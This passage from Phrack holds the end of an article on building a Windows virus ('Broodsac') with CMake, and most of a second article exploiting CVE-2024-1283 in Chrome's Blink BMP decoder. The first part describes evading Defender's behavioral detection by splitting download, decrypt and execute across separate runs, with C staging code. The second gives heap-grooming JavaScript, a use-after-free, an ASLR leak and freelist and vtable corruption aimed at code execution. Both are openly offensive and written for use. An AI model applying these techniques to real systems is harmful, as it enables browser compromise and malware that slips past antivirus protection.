at the linking stage, then adding the obfuscated code as a library
dependency of the main virus. Whenever the virus target is called to be
compiled, the functionality will be obfuscated and incorporated into our
code automatically. Fundamentally, if you can call an external command to
generate anything as part of your build process, the sky's the limit with
what you can incorporate into your program.
As exciting as the implications of these particular capabilities are,
masking the signatures we thought we were hitting on turned out not to be
sufficient. See, as the Defender signature research[5] demonstrates, there
are multiple types of signatures to deal with, and according to
DefenderCheck[6] and the slightly more advanced ThreatCheck[7], I was not
hitting on static signatures. Indeed, digging into the guts of the threat
names in the defender signature database proved relatively fruitless for
hints on how to evade-- there was a static signature algorithm that wasn't
quite coherent on how it was being scanned and, more importantly, a thing
called a "NID."
A NID, in this case, appears to identify something within the Network
Realtime Inspection Service.[8] Probably some sort of metadata about
certain behavior. This means we were likely tripping a behavioral
signature! How could we get around this?
Naively, having not run into this before, we threw random shit at the wall
to see if it worked. Hell's Gate? The Network Realtime Inspection Service
wasn't exactly an EDR, so naturally, it didn't work. Not to mention, with
Microsoft's unique position on the Windows landscape (they are the dungeon
master), attempting to evade EDR just isn't nearly deep enough. But for
the sake of completeness of potential evasions, it was left in Broodsac's
payload. (The Hell's Gate implementation consists of direct syscalls, not
indirect syscalls, so it still could use some work.)
Fundamentally, a behavioral signature relies on chaining certain actions
together to declare something as potentially nasty. Let's step through
what our payload essentially does that could get flagged as potentially
malicious:
+ download an executable
+ perhaps decrypt the executable
+ execute the executable
Frankly I see nothing wrong with this, but apparently Microsoft disagrees!
A funny quirk about behavioral analysis, though, is that it relies on
identifying the behavior of a given execution context, not the sum of its
executions. In order for behavioral analysis to succeed, the bad behaviors
which happen in combination need to happen within the same execution
context. If we split the three tasks above into three separate execution
contexts-- download, decrypt and execute-- will this be sufficient to
bypass the behavioral detection?
Yes! While I did not reverse-engineer NisSrv.exe to see exactly why we
evaded detection, the theory of splitting up tasks across execution contexts
succeeded in bypassing Defender. The payload thus evolved into an
interesting multistage payload. The user would have to run the infected
executable multiple times before a sheep would appear. This would have
the added benefit of stealth through confusion. Where is the sheep coming from?
Why does it keep happening when I run this program? Baffling! But
adorable. In this way, Broodsac lives up to the name of the multi-staged
worm it was named after, the green-banded broodsac.[9]
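A minimal sketch of that staging logic, assuming hypothetical helper
functions and the ProgramData paths used elsewhere in this article; each
run of the infected host performs exactly one of the suspicious actions:
#include <windows.h>
#define SHEEP_ENC "C:\\ProgramData\\sheep.dat"
#define SHEEP_EXE "C:\\ProgramData\\sheep.exe"
/* Hypothetical helpers -- each wraps one of the three actions. */
void download_sheep(const char *dst);
void decrypt_sheep(const char *src, const char *dst);
void run_sheep(const char *path);
/* One suspicious action per run: the behaviors never chain inside a
   single execution context, so the behavioral signature never sees
   the full combination. */
void stage(void)
{
    if (GetFileAttributesA(SHEEP_EXE) != INVALID_FILE_ATTRIBUTES)
        run_sheep(SHEEP_EXE);                /* third run: execute  */
    else if (GetFileAttributesA(SHEEP_ENC) != INVALID_FILE_ATTRIBUTES)
        decrypt_sheep(SHEEP_ENC, SHEEP_EXE); /* second run: decrypt */
    else
        download_sheep(SHEEP_ENC);           /* first run: download */
}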
Our zen garden is tended, and ready to be shared, for others to meditate
upon and ponder for their own gardens. For that meditation, the various
code objects contained in the tarball attached to this article have been
annotated with comments to explain the individual code areas and what
they're doing. Naturally, the complexity of the dinosaur that is the PE
format comes with annoying, disgusting tricks and habits that make one
ashamed of their code in the first place. I apologize on Mark Zbikowski's
behalf.
--[ 6. Conclusions
It is without a doubt that the strange developmental anomalies you see
within wild samples of malware are the byproduct of some sort of build
system. SmokeLoader's use of encrypted functions is certainly not a
feature of the MSVC compiler[10]. But even a nasty rewrite of a C-file
being dumped into a directory for an IDE to compile, while quick and dirty
as we hackers love to do, would technically count as a build system. After
all, the Visual Studio IDE is merely a shell for the build system that is
MSVC. But as virus writers, we are still technically engineers at the end
of the day. We long for the beautiful solution to the problem.
We ultimately want our own little zen garden to tend to.
The beauty of CMake in particular is in the fact that it's cross-platform.
So if you have code-- for example, an obfuscation engine-- that is capable
of being used on multiple platforms, CMake can be used to make building
the project on each platform relatively painless. Just like how CMake
wrangles MSVC, it can also wrangle the complex build environment that is
GNU Make. Many other build targets are supported-- but some not as fully
as MSVC and GNU. Exotic targets may have some difficulty.
I hope I have made a good argument for incorporating build systems into
your payload development. While we can certainly get by with surface-level
shell scripts, wouldn't it be wonderful to get into the guts of the machine
at the linker level? Linux developers have that privilege; why not liberate
that access on Windows? After all, we're all effectively the demons of our
target operating systems-- we lurk at the lowest level of the machine, and
we love it here.
--[ 7. Shouts
0x6d6e647a for editing, dc949 for being family, slop pit for memes and
hardchats.
--[ 8. References
[1]: 40Hex #8: An Introduction to Nonoverwriting Virii, Part II: EXE
Infectors,
https://amethyst.systems/zines/40hex8/40HEX-8.007.txt
[2]: 29A #6: W32.Shrug, by roy g biv,
https://amethyst.systems/zines/29a6/29A-6.615.txt
[3]: 29A #2: PE infection under Win32,
https://amethyst.systems/zines/29a2/29A-2.3_1.txt
[4]: https://github.com/Adrianotiger/desktopPet
[5]: https://github.com/commial/experiments/tree/master/windows-defender
/VDM
[6]: https://github.com/matterpreter/DefenderCheck
[7]: https://github.com/rasta-mouse/ThreatCheck
[8]: https://techcommunity.microsoft.com/t5
/security-compliance-and-identity
/enhancements-to-behavior-monitoring-and-network-inspection
/ba-p/247706
[9]: https://en.wikipedia.org/wiki/Leucochloridium_paradoxum
[10]: https://www.sentinelone.com/blog
/going-deep-a-guide-to-reversing-smoke-loader-malware/,
see "Decoding the Buffer"
--[ 9. Artifacts
begin 644 broodsac.tar.gz
[ uuencoded data truncated ]
|=[ EOF ]=--------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0A of 0x11
|=----------------------------------------------------------------------=|
|=---------------=[ Allocating new exploits ]=----------------=|
|=----------------------------------------------------------------------=|
|=-----------------=[ Pwning browsers like a kernel ]=------------------=|
|=----------=[ Digging into PartitionAlloc and Blink engine ]=----------=|
|=----------------------------------------------------------------------=|
|=----------------------------=[ r3tr074 ]=-----------------------------=|
|=---------------------------=[ r@v8.fail ]=----------------------------=|
|=----------------------------------------------------------------------=|
"He who fights with monsters might
take care lest he thereby become a
monster. And if you gaze for long
into an abyss, the abyss gazes
also into you."
- Friedrich Nietzsche
---[ Index
0 - Introduction
1 - Chromium rendering engine overview
2 - Case study: BMP 0day
2.1 - Bug power, the primitives
3 - PartitionAlloc, the memory allocator
3.1 - PartitionAlloc security guarantees
4 - Exploitation
5 - Takeaways, advances, etc etc etc
6 - References
7 - Exploit code
---[ 0 - Introduction
This article will try to explain a lot about Chrome, Blink, and
PartitionAlloc internals and apply all this knowledge to transform an
extremely restricted bug into arbitrary code execution.
The vulnerability in question is CVE-2024-1283, a heap overflow in the
Blink engine that occurs when decoding BMP images. Using a couple of new
techniques very similar to recent Linux kernel tricks like elastic heap
objects and cross-cache overflow, we can abuse PartitionAlloc and exploit,
in theory, any memory write bug, resulting in full shellcode execution.
---[ 1 - Chromium rendering engine overview
Chromium, and all Chromium-based browsers, use the "Blink rendering
engine" [1]. This component is responsible for much of what happens
within the renderer process, such as parsing HTML, CSS, decoding
images, and more.
"A browser engine (also known as a layout engine or rendering engine)
is a core software component of every major web browser. The primary
job of a browser engine is to transform HTML documents and other
resources of a web page into an interactive visual representation
on a user's device." [2]
Blink is used by Chromium, but is considered a separate library. Its code
can be found within the Chromium source at `src/third_party/blink`, and
its own repository can be found here [3].
While rendering is Blink's responsibility, not all major functionality is
necessarily written in its code. For example, executing JavaScript is
necessary for a rendering engine, but not all of the JS engine is part
of Blink's main code.
This is the case with V8, the JavaScript engine used, which is separate
in the code at `v8/`. It also has its own repository [4]. The same applies
to some image formats [5] and video formats [6]. However, other image
formats are entirely processed by Blink, such as "BMP", "AVIF", and some
others.
We can see them in `src/third_party/blink/renderer/platform/image-decoders`.
---[ 2 - Case study: BMP 0day
After spending some time fuzzing these isolated image formats, I was able
to find a very interesting bug, a "heap-overflow" within BMPImageDecoder
(ASAN shows it as if the overflow happened within Skia, resulting in an
incorrect title for the CVE [7]). Let's understand how this bug occurs,
and what its primitives are! We can start by analyzing the
ASAN stack trace:
r3tr0@chrome:~/fuzz/bmp$ cat /tmp/bad.bmp | ./test-crash
==875756==ERROR: AddressSanitizer: heap-buffer-overflow on address [redacted]
READ of size 32 at 0x521000001100 thread T0
#0 0xdead in unsigned int vector[8] skcms_private::hsw::load()
#1 0xdead in skcms_private::hsw::Exec_load_8888_k()
#2 0xdead in skcms_private::hsw::Exec_load_8888()
#3 0xdead in skcms_private::hsw::exec_stages()
#4 0xdead in skcms_private::hsw::run_program()
#5 0xdead in skcms_Transform
#7 0xdead in blink::BMPImageReader::ProcessRLEData()
#8 0xdead in blink::BMPImageReader::DecodePixelData(bool)
#9 0xdead in blink::BMPImageReader::DecodeBMP(bool)
#10 0xdead in blink::BMPImageDecoder::DecodeHelper(bool)
#11 0xdead in blink::BMPImageDecoder::Decode(bool)
#12 0xdead in blink::ImageDecoder::DecodeFrameBufferAtIndex()
[redacted]
The last function within blink is BMPImageReader::ColorCorrectCurrentRow().
We can see a snippet of this function below:
void BMPImageReader::ColorCorrectCurrentRow() {
...
// address calc here
ImageFrame::PixelData* const row = buffer_->GetAddr(0, coord_.y());
...
const bool success =
skcms_Transform(row, fmt, alpha, transform->SrcProfile(), row, fmt, alpha,
transform->DstProfile(), parent_->Size().width());
DCHECK(success);
buffer_->SetPixelsChanged(true);
}
With a little debugging help, we can conclude that there is an address
calculation error in `buffer_->GetAddr(0, coord_.y());`, where this
function ends up being resolved to this other inline function:
const uint32_t* addr32(int x, int y) const {
SkASSERT((unsigned)x < (unsigned)fInfo.width());
SkASSERT((unsigned)y < (unsigned)fInfo.height());
return (const uint32_t*)((const char*)this->addr32() + (size_t)y * fRowBytes + (x << 2));
}
This function can also be summarized in a single line
`this->addr32() + y * fRowBytes + (x << 2)`.
Somehow `coord_.y()` is equal to -1 in the iteration that causes a crash,
and if we resolve this calculation with this value we can understand why:
this->addr32() + y * fRowBytes + (x << 2);
base_addr + -1 * fRowBytes + (0 << 2);
base_addr - fRowBytes;
Assuming the variables we know, `this->addr32()` is the base address of
the image decoding chunk, y is -1, and x is equal to 0.
Thus, the result will be the base address minus fRowBytes: an address
pointing behind the start of the chunk. The function subsequently called
within Skia then effectively writes into this input buffer; we can treat
it like a `memcpy`. The flaw is not in the function but in what is passed
to it.
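To make the underflow concrete, here is the same calculation as a few
lines of standalone C (the addresses are illustrative):
#include <stdio.h>
#include <stdint.h>
int main(void)
{
    uintptr_t base      = 0x521000001000;  /* base of the BMP chunk */
    size_t    fRowBytes = 0x400;           /* bytes per image row   */
    int       x = 0, y = -1;               /* the off-by-one state  */
    /* this->addr32() + y * fRowBytes + (x << 2) */
    uintptr_t row = base + (size_t)y * fRowBytes + ((size_t)x << 2);
    /* (size_t)-1 * 0x400 wraps around, so row == base - 0x400: an
       address *before* the start of the chunk */
    printf("row = 0x%lx\n", (unsigned long)row);
    return 0;
}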
Looking at the patch [8] makes it clearer why this happens. It's a simple
off-by-one bug, where the `ColorCorrectCurrentRow()` function is called
one more time than expected. Since decoding occurs `top_down`, 1 is
subtracted from y with each iteration; instead of stopping at 0, one
extra iteration happens, and subtracting 1 once again turns y into -1.
----[ 2.1 - Bug power, the primitives
Very good, but what kind of primitives does this bug give us? Where and
what can we write? Analyzing the `skcms_Transform` function, it receives
a kind of "bytecodes" for an image transformation VM. The important part
is that we don't control the bytecode sent, only the input buffer, so we
can't control what is written. Let's analyze an example at runtime and
see what happens:
pwndbg> x/6gx $rdi
0x1180136a000: 0x4141414141414141 0x4242424242424242
0x1180136a010: 0x4343434343434343 0x4444444444444444
0x1180136a020: 0x4545454545454545 0xff00ff00ff00ff00
pwndbg> continue
[redacted]
pwndbg> x/6gx 0x1180136a000
0x1180136a000: 0x4100000041000000 0x4200000042000000
0x1180136a010: 0x4300000043000000 0x4400000044000000
0x1180136a020: 0x4500000045000000 0xff00ff00ff00ff00
Basically, we can only write null bytes, with the exception of 0xff
bytes, which are ignored. The most significant byte of every 4 bytes is
also ignored. These are quite limited writing primitives, but still
powerful.
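A small C model of the resulting primitive, mirroring the before/after
dump above (this simulates the observed effect, not skcms itself):
#include <stddef.h>
#include <stdint.h>
/* Every byte is zeroed, except 0xff bytes and the most significant
   byte of each 4-byte group, which survive untouched. */
void primitive_write(uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0xff) continue;   /* 0xff bytes are ignored     */
        if (i % 4 == 3)     continue;   /* MSB of each dword survives */
        buf[i] = 0x00;
    }
}
/* 41 41 41 41 -> 00 00 00 41, i.e. 0x41414141 -> 0x41000000 */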
Now that we know what we can write, let's see where we can write. Going
back to the address calculation, the only variable we haven't talked about
is fRowBytes.
In our case this variable is always 1/4 of the chunk size, which we can
partially control using the height and width of the image. This results in
a partial overflow of the end of the preceding chunk: assuming the BMP
image chunk has 0x1000 bytes, the last 0x400 bytes of the chunk before it
will be corrupted:
0x400 bytes corrupted
\ /
+---------------------+--------------------+
| |XXXXX| |
| Another chunk |XXXXX| BMP chunk(0x1000) |
| |XXXXX| |
+---------------------+--------------------+
Now everything seems like a lost cause, since we can only write null bytes.
The best idea is to overwrite a `ref_count_` property, but all of them are
located at the beginning of the chunk. To move forward, we need to better
understand how Chromium's custom memory allocator works.
---[ 3 - PartitionAlloc, the memory allocator
"PartitionAlloc is a memory allocator optimized for space efficiency,
allocation latency, and security." [9] (and developed by Google and used
in Chromium by default)
Quickly, we can highlight the most important things about PartitionAlloc:
- It's a SLAB allocator, which means it pre-allocates memory and
organizes it into fixed-size chunks, which is very important from
a security perspective.
- There's a thread cache, like tcache in glibc heap.
- There are some "soft-protections" against certain types of memory
management bugs, like double-free.
- After freeing a slot, the freelist pointer is written in
big-endian at the beginning of this slot.
>> When exploring a SLAB allocator, similar to the kernel, we expect a
very direct exploitation path. Only objects of the same size are
allocated adjacent to each other. Therefore, the vulnerable object
and the victim must share the same size or similar.
Everything in PartitionAlloc is allocated within "pages", which can be:
- System Page
A page defined by the OS, typically 4KiB; sizes up to 64KiB are supported.
- Partition Page
Consists of exactly 4 system pages.
- Super Page
A 2MiB region, aligned on a 2MiB boundary.
- Extent
An extent is a run of consecutive super pages.
System Page
^
+------+
| |
+------+
Partition Page
^
+------+------+------+------+
| | | | |
+------+------+------+------+
Super page (2MiB)
^
+-----------------------------------------------------+
| |
+-----------------------------------------------------+
Within each Super Page, several Partition Pages are allocated, where the
smallest memory units can be divided into:
- Slot: is a single unit chunk
- Slot span: is a run of same-sized chunks
- Bucket: Chains slot spans containing slots of similar size
+-------------------+ +------------------+ +-------------+
|...| PartitionPage | -> | SlotSpanMetadata | -> |freelist_head|
+-------------------+ +------------------+ |-------------|
\ / | bucket |
\ / +-------------+
\ / |
\ / V
+--------------------------------------------------+ +------------------+
| | | | | | | | Partition Bucket |
| Guard | Metadata | Guard | N pages | ... | Guard | +------------------+
| | | | | | |
+--------------------------------------------------+
Super Page
An entire Super Page is allocated as follows: Right at the beginning there
are 3 pages (2 "Guard Pages" which are pages with PROT_NONE to prevent any
kind of linear corruption, and a Metadata page between the other two). This
page has a list of "Partition Pages", which is a struct that controls some
information about the Partition Pages. It also has the SlotSpanMetadata
property, which, besides the freelist_head of that span, has the pointer
to that Bucket.
+------------------+
| Partition Bucket |-------+ +----+
+------------------+ | | |
v | v
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Partition Bucket is a linked list to other buckets of similar sizes.
This is a single slot
| +-----------------+
+------->|0x1000|0x1000|...|
|-----------------| -> this is a slot span
|0x1000|0x1000|...|
+-----------------+
\ /
\ /
\ /
\ /
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Slot Span can be composed of N Partition Pages and has several slots
of exactly the same size adjacent.
PartitionAlloc also has a per-thread cache. It is built to meet the needs
of most common allocations and avoid performance loss in the central
allocator that requires a context lock to prevent two allocations from
returning the same slot.
"The thread cache has been tailored to satisfy a vast majority of
requests by allocating from and releasing memory to the main allocator
in batches, amortizing lock acquisition and further improving locality
while not trapping excess memory." [10]
----[ 3.1 - PartitionAlloc security guarantees
When looking from a security perspective, PartitionAlloc delivers some
guarantees:
1. Linear overflows/underflows cannot corrupt into, out of, or between
partitions. There are guard pages at the beginning and the end of
each memory region owned by a partition.
2. Linear overflows/underflows cannot corrupt the allocation metadata.
PartitionAlloc records metadata in a dedicated, out-of-line region
(not adjacent to objects), surrounded by guard pages. (Freelist
pointers are an exception.)
3. Partial pointer overwrite of freelist pointer should fault.
4. Direct map allocations have guard pages at the beginning and the end.
5. One page can contain only objects from the same bucket, even after
the page is completely freed.
If we look closely, guarantees 1 and 2 basically prevent corruptions
against the Metadata Page and overflow between Super Pages. This is the
job of the "Guard Page" mentioned above, a memory page with the PROT_NONE
protection, which will cause a crash when trying to read, write, or
execute anything within that page.
Guarantee 3 simply involves storing the freelist pointer in big-endian
format. A partial overwrite of the stored bytes therefore lands on the
most significant bytes of the decoded pointer, completely changing it.
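In code form, with a plain byte swap standing in for PartitionAlloc's
actual encoding, the idea looks like this:
#include <stdint.h>
/* A freed slot stores its next pointer byte-swapped ("big-endian"). */
static uint64_t encode_ptr(uint64_t p) { return __builtin_bswap64(p); }
static uint64_t decode_ptr(uint64_t p) { return __builtin_bswap64(p); }
/* 0x0000521000001000 sits in memory as 00 00 52 10 00 00 10 00, so an
   attacker who can only reach the first few bytes of the slot is
   actually editing the *top* of the decoded pointer -- the result lands
   far outside the Super Page and faults when dereferenced. */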
Guarantee 4 is just a variation of guarantees 1 and 2, where, if it is
necessary to allocate a very large chunk that does not fit into a common
Super Page, this memory is allocated directly by mapping memory. This
mapped memory is again placed between two "Guard Pages", one at
the beginning and one at the end.
Finally, guarantee 5 is useful against type confusion attacks and attempts
to abuse a UAF between pages.
So, if you paid attention, there are no guarantees or protections that
prevent two buckets of completely different sizes from being allocated
adjacent to each other without any kind of red zone between them (as is
the case of Guard Pages between Super Pages). Therefore, it is entirely
possible and stable to create this layout:
vuln obj size=0x1000 victim obj size=0x4000
+----------+ +----------+
| ... | | victim |
|----------| |----------|
| vuln | | ... |
+----------+ +----------+
\ \ / /
\ \ / /
\ \ / /
\ \/ /
+---------------------------------------------------+
| | | | | | | |
| G | M | G | 2 pages | 3 pages | ...N pages | G |
| | | | | | | |
+---------------------------------------------------+
Testing the hypothesis, I could verify that we can create extremely
stable memory layouts, with objects of different sizes adjacent to each
other.
---[ 4 - Exploitation
With the possibility of overflowing into any other slot of a different
size, we just need to find an interesting target. We could search for an
object with a |length_| property, but since we can only write null bytes,
I believe we can take more advantage of the bug by attacking a
|ref_count_| property. Looking for references of good targets, we can
follow existing work used to exploit the well-known "The WebP 0day" [11].
Objects and structures in CSS are allocated by Blink itself. Among these
objects is CSSVariableData, which represents the value of variables within
CSS [12]. It seems to be a great target for several reasons:
- It's an elastic object, so we can force it to fit in our bucket or any
other; this object can vary in size between 16 bytes and
2097152 bytes (`kMaxVariableBytes`).
- It's a "ref counted" object.
- It doesn't have any pointers that could cause a crash when
dereferenced.
In `css_variable_data.h`, we can see the description of the object:
class CORE_EXPORT CSSVariableData : public RefCounted<CSSVariableData> {
...
private:
...
// 32 bits refcount before this.
// We'd like to use bool for the booleans, but this causes the struct to
// balloon in size on Windows:
// https://randomascii.wordpress.com/2010/06/06/bit-field-packing-with-visual-c/
// Enough for storing up to 2MB (and then some), cf. kMaxSubstitutionBytes.
// The remaining 4 bits are kept in reserve for future use.
const unsigned length_ : 22;
const unsigned is_animation_tainted_ : 1; // bool.
const unsigned needs_variable_resolution_ : 1; // bool.
const unsigned is_8bit_ : 1; // bool.
unsigned has_font_units_ : 1; // bool.
unsigned has_root_font_units_ : 1; // bool.
unsigned has_line_height_units_ : 1; // bool.
const unsigned unused_ : 4;
In memory, this object reflects this layout:
0 4 8 16
+------------+----------+-+-------------------------+
| ref_count_ | length_ |F| String content |
+------------+----------+-+-------------------------+
| String content... |
+---------------------------------------------------+
> F = flags
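Read back as a plain C struct, the header looks roughly like this (a
sketch only: bitfield packing is compiler-dependent, but it mirrors the
diagram above):
#include <stdint.h>
struct css_variable_data {                     /* sketch of the layout */
    uint32_t ref_count_;                       /* offset 0             */
    uint32_t length_                     : 22; /* offset 4, up to 2MB  */
    uint32_t is_animation_tainted_       : 1;
    uint32_t needs_variable_resolution_  : 1;
    uint32_t is_8bit_                    : 1;
    uint32_t has_font_units_             : 1;
    uint32_t has_root_font_units_        : 1;
    uint32_t has_line_height_units_      : 1;
    uint32_t unused_                     : 4;
    /* offset 8: the string content follows inline */
};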
And the code that allocates this object can be found in the same file:
// third_party/blink/renderer/core/css/css_variable_data.h:34
static scoped_refptr<CSSVariableData> Create(StringView original_text,
bool is_animation_tainted,
bool needs_variable_resolution,
bool has_font_units,
bool has_root_font_units,
bool has_line_height_units) {
if (original_text.length() > kMaxVariableBytes) {
// This should have been blocked off during variable substitution.
NOTREACHED();
return nullptr;
}
wtf_size_t bytes_needed =
sizeof(CSSVariableData) + (original_text.Is8Bit()
? original_text.length()
: 2 * original_text.length());
void* buf = WTF::Partitions::FastMalloc(
bytes_needed, WTF::GetStringWithTypeName<CSSVariableData>());
return base::AdoptRef(new (buf) CSSVariableData(
original_text, is_animation_tainted, needs_variable_resolution,
has_font_units, has_root_font_units, has_line_height_units));
}
Well, it seems like a great target, but now we need to discuss which
bucket this object will be allocated in. Due to the thread cache, the
objects won't be placed together. We need to force the thread cache to
clear the bucket so that our vulnerable object and victim share the same
Super Page. Luckily, this is quite simple to do. We just need to fill the
cache up to the "limit", as can be seen in this comment:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.cc:586
// For each bucket, there is a |limit| of how many cached objects there are in
// the bucket, so |count| < |limit| at all times.
// - Clearing: limit -> limit / 2
// - Filling: 0 -> limit / kBatchFillRatio
The code that executes this subroutine can be seen below:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.h:511
PA_ALWAYS_INLINE bool ThreadCache::MaybePutInCache(uintptr_t slot_start,
size_t bucket_index,
size_t* slot_size) {
PA_REENTRANCY_GUARD(is_in_thread_cache_);
...
auto& bucket = buckets_[bucket_index];
...
uint8_t limit = bucket.limit.load(std::memory_order_relaxed);
// Batched deallocation, amortizing lock acquisitions.
if (PA_UNLIKELY(bucket.count > limit)) {
ClearBucket(bucket, limit / 2);
}
...
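As a toy model of that counting logic (not the real allocator; the limit
here is illustrative, the real one is tuned at runtime):
/* Toy model of the per-bucket thread cache fill/clear cycle. */
enum { LIMIT = 128 };
static int count;  /* slots currently cached in this bucket */
void cache_free_one(void)
{
    if (++count > LIMIT)
        count = LIMIT / 2;  /* ClearBucket(bucket, limit / 2) */
}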
Now let's create this layout with JS. How can we manipulate these objects
to create a perfect layout?
First, let's force the allocation of a new Super Page to have more
control. For this, we can simply do several sprays:
let div0 = document.getElementById('div0');
for (let i = 0; i < 30; i++) {
div0.style.setProperty(`--sprayA${i}`, kCSSString);
div0.style.setProperty(`--sprayC${i}`, kCSSStringCross0x2000);
div0.style.setProperty(`--sprayB${i}`, kCSSStringHRTF);
}
After that, let's force object A to be adjacent to C. Object B should be
allocated close to, but not adjacent to, the others, as it will be useful
for acquiring memory leaks.
for (let i = 0; i < 50; i++) {
for (let j = 0; j < 4; j++) {
// spraying allocation of 2 different size spans
// very close to 100% of attempts, the same object is allocated
// after a different sized slot
const CSSValName = `${i}.${j}`.padEnd(0x7fcc, 'A');
div0.style.setProperty(`--a${i}.${j}`, CSSValName);
const CSSValName2 = `${i}.${j}`.padEnd(0x1fcc, 'C');
div0.style.setProperty(`--c${i}.${j}`, CSSValName2);
}
for (let j = 0; j < 64; j++) {
const CSSValName = `${i}.${j}`.padEnd(0x414, 'B');
div0.style.setProperty(`--b${i}.${j}`, CSSValName);
}
}
And finally, let's clear the bucket to finish preparing our layout:
for (let i = 10; i < 30; i++) {
div0.style.removeProperty(`--a${i}.2`);
}
for (let i = 46; i > 20; i--) {
div0.style.removeProperty(`--c${i}.0`);
}
gc(); await sleep(500);
Now, after creating the correct heap layout, we will overwrite the
`ref_count_`, trigger a free, and allocate a fully controllable data
object over the victim object, thus creating a UAF condition.
We can abuse our conditional write of null bytes. Recall that 0xff bytes
are ignored, so we can increase the `ref_count_` to `0xff01` and trigger
the vulnerability. After this, the ref count will be `0xff00`, and
calling `gc();` will free this object while we still have an active
reference.
>> Remember: the `ref_count_` actually starts at 2, so we need to
increase it to `0xff02`; otherwise the ref count would reach -1
and cause a crash.
+------------+----------+-+-------------------------+
| 2 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| increase `ref_count_` (+0xff00)
|
v
+------------+----------+-+-------------------------+
| 0xff02 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| Trigger vuln
|
v
+------------+----------+-+-------------------------+-------------------+
| 0xff00 | 0x0000 |F| "A\x00\x00\x00" | |
+------------+----------+-+-------------------------+ BMP vuln chunk... |
| "A\x00\x00\x00..." | |
+---------------------------------------------------+-------------------+
|
| Call `gc();` and decrease
| `ref_count_` (-0xff00)
v
+-------------------------+-------------------------+
| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
Perfect! We can use any object to consume this freelist entry and overwrite
the |length_| property. For this, we will use an AudioArray that we can
control entirely. AudioArray is also an elastic object that has been used
to exploit another type of UAF previously [13].
Now we can OOB read:
fetch("/bad.bmp").then(async response => {
let rs = getComputedStyle(div0);
let imageDecoder = new ImageDecoder({
data: response.body,
type: "image/bmp"
});
increase_refs(0xff02); // overflow will overwrite 0xff02 to 0xff00
imageDecoder.decode().then(async () => {
gc(); gc();
await sleep(2500);
let ab = new ArrayBuffer(0x600);
let view = new Uint32Array(ab);
// fake CSSVariableData
view[0] = 1; // ref_count
const newCSSVarLen = 0x19000;
view[1] = newCSSVarLen | 0x01000000; // length and flags, set is_8bit_
for (let i = 2; i < view.length; i++)
view[i] = i;
await allocAudioArray(0x2000, ab, 1);
leak();
})
});
async function leak() {
console.log("continuing...");
let div0 = document.getElementById('div0');
let rs = getComputedStyle(div0);
let CSSLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
console.log(CSSLeak.length.toString(16));
...
Good, but not enough: we've defeated ASLR, but now we need a control
flow hijacking idea. Instead of looking for more good victim objects, we
can directly attack PartitionAlloc again and corrupt the freelist pointer.
The idea is to create a double-free condition, which will result in a
circular freelist and ultimately let us overwrite the pointer.
CSSVariableData and AudioArray essentially point to the same address, so
we can cause both of them to be freed, creating a "double-free". If we do
this, the freelist pointer written in the chunk will point to itself:
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
This circular freelist is extremely powerful, because we can use the same
AudioArray as before to corrupt the freelist pointer. The next allocation
request will return the pointer we want, giving us an arbitrary write.
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
|
| Alloc an AudioArray and corrupt freelist
|
v
+-------------------------+-------------------------+
| corrupted ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
The only restriction for the corrupted pointer is that it must be from
within the same Super Page. To achieve code execution, we will deallocate
object B and allocate objects that have vtables, then corrupt the
freelist to point to one of these objects. This way, we can corrupt the
vtable pointer and easily gain control-flow hijacking. The following
snippet of the exploit allocates the vtable objects and leaks their
addresses:
CSSVars = [
// this regex is used to find the B objects in memory
// the pattern matches: ref_count(2) + length(0x414)/flags + "${i}.${j}" + "BBBB..."
...CSSLeak.matchAll(/\x02\x00\x00\x00\x14\x04\x00\x01(\d+\.\d+)/g)
];
...
for (let i = 0; i < kSprayPannerCount; i++) {
panners.push(audioCtx.createPanner());
}
for (let i = 0; i < kSprayPannerCount; i++) {
// i really don't know why, but i need to bump the ref_count_ and remove
// the prop to trigger the free
rs.getPropertyValue(`--b${CSSVars[i][1]}`);
div0.style.removeProperty(`--b${CSSVars[i][1]}`);
}
gc(); gc(); await sleep(1000);
for (let i = 0; i < panners.length; i++) {
// allocating objects with vtables
panners[i].panningModel = 'HRTF';
}
// free two panners after target CSSVariableData
panners[kSprayPannerCount - 2].panningModel = 'equalpower';
panners[kSprayPannerCount - 1].panningModel = 'equalpower';
await sleep(1000);
let hrtfLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
And now just create the fake vtable and profit!!
let ab = new ArrayBuffer(0x600);
let abFakeObj = new ArrayBuffer(0x600);
let view = new BigUint64Array(ab);
let viewFakeObj = new DataView(abFakeObj);
view[0] = swapEndian(fakePannerAddr - 0x10n);
for (let i = 0; i < viewFakeObj.byteLength; i++)
viewFakeObj.setUint8(i, 0x4a); // "J"
const system_addr = chromeBase + kSystemLibcOffset;
// call qword ptr [rax + 8]
viewFakeObj.setBigUint64(0x0, fakePannerAddr + 8n - 8n, true);
// viewFakeObj.setBigUint64(8, 0xdeadbeefn, true);
viewFakeObj.setBigUint64(0x8, chromeBase + kWriteListenerOffset, true);
// fake BindState addr
viewFakeObj.setBigUint64(0x10, fakePannerAddr + 0x18n, true);
// start of fake BindState
// The first int64 are the value which will passed to function address
// in second int64
